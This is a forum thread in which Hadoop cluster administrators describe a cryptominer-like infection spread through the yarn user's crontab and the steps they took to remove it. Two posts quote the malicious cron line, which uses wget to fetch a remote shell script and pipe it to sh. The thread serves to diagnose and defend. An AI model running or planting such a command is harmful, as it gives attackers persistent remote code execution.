I experienced the problem on a new cluster, it was flooded with strange jobs from nowhere. In my case, the following was found in the crontab of 'yarn' user on each host:
*/2 * * * * wget -q -O - http://220.127.116.11/cr.sh | sh > /dev/null 2>&1
So, the suggestion is first to check 'sudo -u yarn crontab -l' (or maybe sudo -u dr.who). Still don't know, how it was infected.
I ran into something like this recently on a POC cluster. The problem seen on this cluster was a "yarn" process was consuming 100% of cpu resources on multiple servers. We shutdown all of the HDP services via Ambari to make sure there wasn't any rogue HDP processes running. This "yarn" process was still running.
It turns out it was a process running this:
/var/tmp/java -c /var/tmp/w.conf
Killing the process with "kill -9" would kill the process off only for it to respawn a few seconds later. Removing the "/var/tmp/java" file also only worked for a few seconds before it too returned.
We ended up looking at crontab and found this:
$ sudo -u yarn crontab -e */2 * * * * wget -q -O - http://18.104.22.168/cr.sh | sh > /dev/null 2>&1
We removed the crontab entry, killed the running process and remove the java file on all nodes. The processes no longer returned and we restarted the HDP cluster via Ambari. The root cause appeared to be security group rules on AWS allowing access to the cluster.
I've seen variations of this reported out of /tmp/java and using "h.conf" instead of "w.conf".
I solved this problem by change the owner and permission of dr.who path:
chown -R root:root /var/log/hadoop/yarn/local/usercache/dr.who
chmod -R 400 /var/log/hadoop/yarn/local/usercache/dr.who
chown -R root:root /hadoop/yarn/local/usercache/dr.who
chmod -R 400 /hadoop/yarn/local/usercache/dr.who
Now, the "NodeManagers" don't stop for this problem anymore.